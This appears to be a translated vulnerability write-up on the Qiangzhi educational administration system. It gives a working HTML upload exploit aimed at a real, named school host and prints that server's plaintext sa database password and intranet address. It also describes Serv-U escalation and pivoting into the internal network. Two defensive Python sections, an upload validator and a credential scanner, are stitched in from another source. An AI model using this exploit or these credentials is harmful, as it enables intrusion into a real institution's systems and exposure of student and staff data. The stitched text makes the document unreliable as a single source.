Qiangzhi educational administration system: universal getshell (privilege escalation, server and intranet penetration)
File: jwgl\jcxx\savetofile.asp
<% Option Explicit %>
<!-- #include FILE="upfile_class.asp" -->
<%
Server.ScriptTimeout = 0000000
dim upfile, formPath, ServerPath, FSPath, formName, FileName, oFile
set upfile = new upfile_class
upfile.getData(10240000) ' read the uploaded data; maximum upload size 10 MB
%>
Exploit (exp.html):
<form method="post" name="form1" action="http://e.tjmvti.cn/jwgl/jcxx/savetofile.asp" enctype="multipart/form-data">
<table border="0" align="center" cellpadding="0" cellspacing="0" width="100%">
<tr><td><div align="center"><font color="#0000ff" size="4"><b>exp</b></font></div></td></tr>
<tr><td>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#111111" style="BORDER-COLLAPSE: collapse">
<tr><td height="27" width="100" colspan="5">&nbsp;</td></tr>
<tr><td width="750" colspan="5"><div id="uptd"></div></td></tr>
<tr>
<td height="30" align="middle" width="50"><input type="file" name="uploadfile" size="100"></td>
<td height="30" align="middle" width="100"><p align="center"><input type="submit" name="Button2" class="bt" value="Upload"></td>
<td height="30" align="middle" width="100"></td>
</tr>
</table>
</td></tr>
</table>
</form>
Open exp.html and upload any file directly; savetofile.asp checks neither the session nor the file type. The server basically runs with sa privileges, so privilege escalation is already complete.
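The handler above stores whatever the client sends, under the client's chosen name, with no login check. As an added example (not the vendor's code), the following Python sketch shows the checks a replacement upload handler needs: an authenticated session, a size ceiling, an extension allowlist applied to every dotted segment of the name (so shell.asp.jpg is rejected along with shell.asp), a strict character set that rules out path separators, NUL bytes and semicolons, and a server-generated file name stored outside the web root. The allowlist, the script-extension set and the /srv/uploads directory are assumptions.

```python
import os
import re
import secrets

# Constructed policy for a hardened replacement of a handler like
# savetofile.asp (added example, not the vendor's code). The original
# handler accepts any file from any client; these are the checks it lacked.
MAX_UPLOAD_BYTES = 10 * 1024 * 1024          # the same 10 MB ceiling the page shows
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}   # assumed allowlist

# Extensions IIS/ASP hands to a script engine. They are refused in any
# segment of the name, not only the last one.
SCRIPT_EXTENSIONS = {"asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx",
                     "cer", "cdx", "htr", "php", "jsp", "exe", "dll"}

# Names may contain only letters, digits, '_', '-' and dots. This alone
# rejects path separators, NUL bytes and the ';' and '%' name tricks.
SAFE_NAME = re.compile(r"[A-Za-z0-9_\-]+(\.[A-Za-z0-9]+)+")


def validate_upload(filename, size, authenticated):
    """Decide whether an upload may be stored.

    Returns (True, generated_name) when accepted, or (False, reason) when
    rejected. The generated name is random, so the client's name never
    reaches the disk.
    """
    if not authenticated:
        return False, "no session"            # savetofile.asp had no such check
    if size <= 0 or size > MAX_UPLOAD_BYTES:
        return False, "bad size"
    if not SAFE_NAME.fullmatch(filename):
        return False, "unsafe characters in name"
    segments = filename.lower().split(".")[1:]
    if any(seg in SCRIPT_EXTENSIONS for seg in segments):
        return False, "script extension"      # catches shell.asp.jpg as well
    if segments[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    # Server-chosen random name; only the validated extension is kept.
    return True, f"{secrets.token_hex(16)}.{segments[-1]}"


def storage_path(generated_name, upload_dir="/srv/uploads"):
    """Place the file in a directory outside the web root (assumed path)."""
    return os.path.join(upload_dir, generated_name)


if __name__ == "__main__":
    for name in ("photo.jpg", "shell.asp", "shell.asp.jpg",
                 "shell.asp;.jpg", "../web.config", "notes.txt"):
        print(f"{name:16} -> {validate_upload(name, 2048, True)}")
```

The ordering matters: the character-set check runs before the extension logic, so a name that would confuse the extension split never gets that far, and the accepted name is generated rather than sanitised.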
Configuration file:
Conn\connstring.asp:

<!-- #include file="../../connstring.asp" -->
<%
' the include above must not be deleted
ServerName = Request.ServerVariables("Server_Name")
programName = "jwgl"
SName = "10.0.0.1"
DBName = "TJMTI"
DBBackDirName = "Dbback"
if ProgramName = "" then ServerNameProgramName = ServerName else ServerNameProgramName = ServerName & "/" & ProgramName
if Connstring = "" then connstring = "driver={SQL server};server=" & Sname & ";database=" & DBName & ";uid=sa;pwd=qzdatasoft123456789" ' database connection statement
%>

The administrator was fairly clever and put the database on a separate host from the web service, but that separation is exactly what makes the later intranet penetration so damaging:
The server also ships with Serv-U, so Serv-U Exec gives privilege escalation.
As you can see, the servers are riddled with trojans (webshells), and there are more threats than that.
Key statement:
if Connstring = "" then connstring = "driver={SQL server};server=" & Sname & ";database=" & DBName & ";uid=sa;pwd=qzdatasoft123456789"
With the sa credentials in hand, escalation moves straight to the 10.0.0.1 database server.
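The key statement above is a hardcoded sa login with a plaintext password in a source file every web user of the box can read. As an added example (not the vendor's code), the following Python scanner finds connection strings of that shape in ASP source, flags the sysadmin account and the plaintext password, and reports the password masked so the finding can be filed without copying the secret. The sample file is constructed and its password value is a placeholder; the page's real password is deliberately not repeated here.

```python
import re

# Constructed sample in the shape of the page's connstring.asp (added
# example, not the vendor's file); the password is a placeholder value.
SAMPLE_CONNSTRING_ASP = '''<%
ServerName = Request.ServerVariables("Server_Name")
SName = "10.0.0.1"
DBName = "TJMTI"
if Connstring = "" then connstring = "driver={SQL server};server=" & Sname & ";database=" & DBName & ";uid=sa;pwd=PLACEHOLDER_PASSWORD"
%>'''

# ODBC/OLE DB style credential pairs: uid=...;pwd=... or User Id=...;Password=...
CRED_RE = re.compile(
    r'(?:uid|user\s*id)\s*=\s*(?P<user>[^;"]+);\s*(?:pwd|password)\s*=\s*(?P<pwd>[^;"]*)',
    re.IGNORECASE,
)


def mask(secret):
    """Keep the first two characters so a finding is recognisable, hide the rest."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_connstrings(source):
    """Return one finding per hardcoded credential pair found in an ASP source string."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in CRED_RE.finditer(line):
            user = m.group("user").strip()
            pwd = m.group("pwd")
            issues = ["hardcoded credential in source"]
            if user.lower() == "sa":
                issues.append("uses the sa sysadmin account")
            if pwd:
                issues.append("plaintext password")
            findings.append({
                "line": lineno,
                "user": user,
                "password_masked": mask(pwd),
                "issues": issues,
            })
    return findings


if __name__ == "__main__":
    for f in scan_connstrings(SAMPLE_CONNSTRING_ASP):
        print(f"line {f['line']}: user={f['user']} pwd={f['password_masked']}")
        for issue in f["issues"]:
            print("  -", issue)
```

Run against a deployed tree, every hit is a credential to rotate and a login to replace with a least-privilege database user (or integrated authentication) whose secret lives in a file the web application can read but the site directory does not serve.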
There are other cases like this as well.
Solution:
Is this a small vendor?